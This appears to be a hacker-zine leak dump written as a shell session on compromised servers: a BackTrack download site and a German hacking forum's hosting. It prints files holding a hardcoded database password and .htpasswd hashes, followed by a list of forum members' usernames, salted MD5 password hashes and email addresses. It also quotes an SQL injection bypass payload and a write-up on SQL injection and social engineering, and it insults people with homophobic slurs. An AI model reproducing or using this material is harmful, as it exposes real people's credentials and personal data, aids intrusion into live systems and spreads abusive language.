apache 3702 Dec 9 12:20 wp-trackback.php +-rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png +-rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif +-rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php + +$ cat wp-config.php + +$ cat stats.txt +BackTrack 4 - 4916323 downloads + +cat download.php + EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!! 
+ +function getRealIpAddr() +{ + if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet + { + $ip=$_SERVER['HTTP_CLIENT_IP']; + } + elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy + { + $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; + } + else + { + $ip=$_SERVER['REMOTE_ADDR']; + } + return $ip; +} + +$ip=getRealIpAddr(); + +$username="root"; +$password="234hi2u3d98as7d23kuh"; +$database="counter"; + +function choose($iso) +{ + + $num = Rand (1,5); + switch ($num) + { + case 1: + $link="ftp://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 2: + $link="http://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 3: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 4: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 5: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + +// case 6: +// $link="http://moon.backtrack-linux.org/downloads/$iso"; +// break; + + + } + + +return $link; + +} + + +$version=$_GET["fname"]; + +if (! 
(($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm"))) + +{ + echo "This page cannot be accessed directly."; + exit; +} + +if ($version=="bt4r2") +{ + + $iso="bt4-r2.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + +if ($version=="bt4r2vm") +{ + + $iso="bt4-r2-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + + +if ($version=="bt4f") +{ + + $iso="bt4-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4fvm") +{ + $iso="bt4-final-vm.zip"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1") +{ + $iso="bt4-r1.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + 
header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1vm") +{ + $iso="bt4-r1-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4pf") +{ + $iso="bt4-pre-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4b") +{ + $iso="bt4-beta.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4bvm") +{ + $iso="bt4-beta-vm-6.5.1.rar"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt3") +{ + $iso="bt3-final.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +else +{ + exit; +} + +?> + + +$ cat s.php + + +$ cd wiki + +$ ls + +total 700 +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 . +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .. +-rw-r--r--. 
1 apache apache 23 Nov 14 16:01 .htpasswd +-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING +-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS +-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ +-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY +-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT +-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL +-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php +-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README +-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES +-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample +-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE +drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense +-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php +-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5 +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin +-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache +drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs +drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions +drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images +-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php +-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5 +drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes +-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php +-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5 +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages +drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math +-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php +-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5 +-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5 +-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php +-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php +-rw-r--r--. 
1 apache apache 31 Feb 3 2008 redirect.php5 +-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized +-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml +drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins +-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php +-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5 +-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php +-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5 +-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml + +$ cat .htpasswd +edbadmin:YE8mle4nG1Z.c + +cd .. +cat forums/includes/config.php + /proc/vz/vzaquota/00000045/aquota.group +lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user +drwx--x--x 3 root root 4096 Nov 13 09:00 backup +drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin +drwxr-xr-x 2 root root 4096 Jan 26 2010 boot +drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev +drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc +drwx--x--x 8 root root 4096 Nov 14 07:11 home +drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib +drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64 +drwxr-xr-x 2 root root 4096 Jan 26 2010 media +drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt +drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt +dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc +drwxr-x--- 14 root root 4096 Dec 8 21:36 root +drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin +drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts +drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux +drwxr-xr-x 2 root root 4096 Jan 26 2010 srv +drwxr-xr-x 3 root root 0 Nov 30 02:12 sys +drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp +drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr +drwxr-xr-x 22 root root 4096 Nov 11 18:01 var + +$ ls -la /home/freehack/public_html +total 3100 +drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 . +drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 .. 
+-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess +drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd +-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log +drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt +-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php +-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php +-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php +-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php +-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php +-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php +-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php +-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php +-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php +-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php +-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php +-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php +-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php +-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache +-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive +-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php +-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php +-rw-r--r-- 1 freehack freehack 
80983 Jan 18 2010 automediaembed_admin.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php +-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php +-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php +-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php +-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png +-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php +drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder +drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog +-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php +-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php +-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin +-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples +-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php +drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm +drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles +-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php +-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php +-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php +-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics +-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php +-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php +-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php +-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php 
+-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php +-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico +-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php +-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php +-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php +-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php +-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php +-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html +-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php +-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php +-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php +-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess +-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php +drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images +drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img +drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes +-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php +-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php +-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php +-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php +-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp +-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php +-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php +-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php +-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php +-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php +-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php +-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php +-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php +-rw-r--r-- 1 freehack freehack 18911 Jan 18 
2010 newthread.php +-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php +drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste +-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png +-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php +-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php +-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php +-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php +-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php +-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php +-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php +-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php +-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php +-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php +-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php +-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php +-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php +-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php +-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php +-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php +-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php +-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php +-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php +-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php +-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php +-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php +-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap +-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php +-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php +-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php 
+-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php +-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php +drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp +-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php +-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php +drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise +drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo +-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php +drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap +-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php +-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php +-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php +-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php + + +RETARDED PHP CODE ALERT! + +$ cat x.php + + + + +$ cd 2tgh9322132k322l1sd + +$ ls +total 252 +drwxr-xr-x 11 508 504 4096 Nov 14 09:24 . +drwxr-x--- 34 508 99 4096 Dec 4 22:13 .. +-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess +-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe +-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php +-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css +-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php +-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log +-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php +-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc +-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php +-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js +drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language +-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php +-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php +-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron +-rw-r--r-- 1 508 504 776 Sep 22 2009 
refresh_dblist.php +-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php +-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php +drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl +drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work + +$ cat .htpasswd +Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1 + +$ cat config.php +1000 +$config['processlist_refresh']=3000; + +$config['empty_db_before_restore']=0; +$config['optimize_tables_beforedump']=1; +$config['stop_with_error']=1; + +// For sending a mail after backup set send_mail to 1, otherless set to 0 +$config['send_mail']=0; +// Attach the backup 0=no 1=yes +$config['send_mail_dump']=0; +// set the recieve adress for the mail +$config['email_recipient']=''; +$config['email_recipient_cc']=''; +// set the sender adress (the script) +$config['email_sender']=''; + +//max. Size of Email-Attach, here 3 MB +$config['email_maxsize1']=3; +$config['email_maxsize2']=2; + +// FTP Server Configuration for Transfer +$config['ftp_transfer'][0]=0; +$config['ftp_timeout'][0]=30; +$config['ftp_useSSL'][0]=0; +$config['ftp_mode'][0]=0; +$config['ftp_server'][0]=''; // Adress of FTP-Server +$config['ftp_port'][0]='21'; // Port +$config['ftp_user'][0]=''; // Username +$config['ftp_pass'][0]=''; // Password +$config['ftp_dir'][0]=''; // Upload-Directory + +$config['ftp_transfer'][1]=0; +$config['ftp_timeout'][1]=30; +$config['ftp_useSSL'][1]=0; +$config['ftp_mode'][1]=0; +$config['ftp_server'][1]=''; +$config['ftp_port'][1]='21'; +$config['ftp_user'][1]=''; +$config['ftp_pass'][1]=''; +$config['ftp_dir'][1]=''; + +$config['ftp_transfer'][2]=0; +$config['ftp_timeout'][2]=30; +$config['ftp_useSSL'][2]=0; +$config['ftp_mode'][2]=0; +$config['ftp_server'][2]=''; +$config['ftp_port'][2]='21'; +$config['ftp_user'][2]=''; +$config['ftp_pass'][2]=''; +$config['ftp_dir'][2]=''; + +//Multipart 0=off 1=on +$config['multi_part']=0; +$config['multipartgroesse1']=1; +$config['multipartgroesse2']=2; +$config['multipart_groesse']=0; + +//Auto-Delete 0=off 1=on 
+$config['auto_delete']=0; +$config['max_backup_files']=3; + +//configuration file +$config['cron_configurationfile']='mysqldumper.conf.php'; +//path to perl, for windows use e.g. C:perlbinperl.exe +$config['cron_perlpath']='/usr/bin/perl'; +//mailer use sendmail(1) or SMTP(0) +$config['cron_use_sendmail']=1; +//path to sendmail +$sendmail_path=ini_get('sendmail_path'); +$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem'; + +//adress of smtp-server +$config['cron_smtp']='localhost'; +//smtp-port +$config['cron_smtp_port']=25; +$config['cron_extender']=0; +$config['cron_compression']=1; +$config['cron_printout']=1; +$config['cron_completelog']=1; +$config['cron_comment']=''; +$config['multi_dump']=0; +$config['logcompression']=1; +$config['log_maxsize1']=1; +$config['log_maxsize2']=2; +$config['log_maxsize']=1048576; + + + ________________________ + | |_____ __ + | FREE-HACK LIST OF LAME | |__| |_________ + |________________________| |::| | / + /\**/\ | \.____|::|__| < +( o_o )_ | \::/ \._______\ + (u--u \_) | + (||___ )==\ +,dP"/b/=( /P"/b\ +|8 || 8\=== || 8 +`b, ,P `b, ,P + """` """` + +AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de +fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com +N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com +100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de +Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com +noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de +Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru +sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de +Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com +Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de +inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de +H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de +meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net 
+J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com +#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de +enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru +Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com +Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com +PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de +GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de +GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com +Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com +DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com +Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru +novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net +ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net +krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com + +We think that novaca!ne's magic_quotes bypass is quite representative +for this group: + +--snip snip-- + +Bypass magic_quotes (novaca!ne) +magic_quotes is a php setting (php.ini). +It causes that every ' (single-quote), " (double quote) and \ (backslash) +are escaped with a backslash automatically, a weak but wellknown securing method. +This is how to bypass it: +Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command +into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling. +‘ OR ‘a’ = ‘a equals +String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97) + +--snip snip-- + +novaca!ne is (next to fred777) of course, our new security superhero! +Congratz, faggot... + +Finally we shouldn't forget our old fag superhero fred777, who helped +us to understand how we could get every source code of a page. 
This +sounds pretty hard, but fred777 shows his priv8 techniques (we fear +them): + +--snip snip-- +######################################################### +# Sourcecode disclosure by social engineering +# tested on NPD +######################################################### + +Intro: +Ich schildere hier mal einen Fall, welchen ich letztens +noch vor mir hatte. Ich war durch Zufall mal wieder auf den +vielen NPD Seiten, um nach Lücken zu suchen. +Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte +es den Anschein, als ob sich da eine SQL Injection befände. + +Sobald nämlich der Limitparameter falsch übergeben wurde, kam der +übliche SQL Error: + +--------------------------------------------------------- + +Rein logisch sah der Query so aus: + +SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10; + +Als ich dann mittels eines Scripts versuchte den Query mit UNION +zu erweitern, wollte es aber nicht funktionieren. +Klar dafür konnte es so einige Gründe geben, allerdings hätte +ich mir zu gerne den Source + Abfragen angeschaut. + +--------------------------------------------------------- + +Wieso eigentlich nicht? + +Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den +Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt. + +--snip snip-- + +What we learned is: +- If we write an email to an admin we always get the source code +- fred777 uses tools to exploit some sql injection + +"o_O", one of 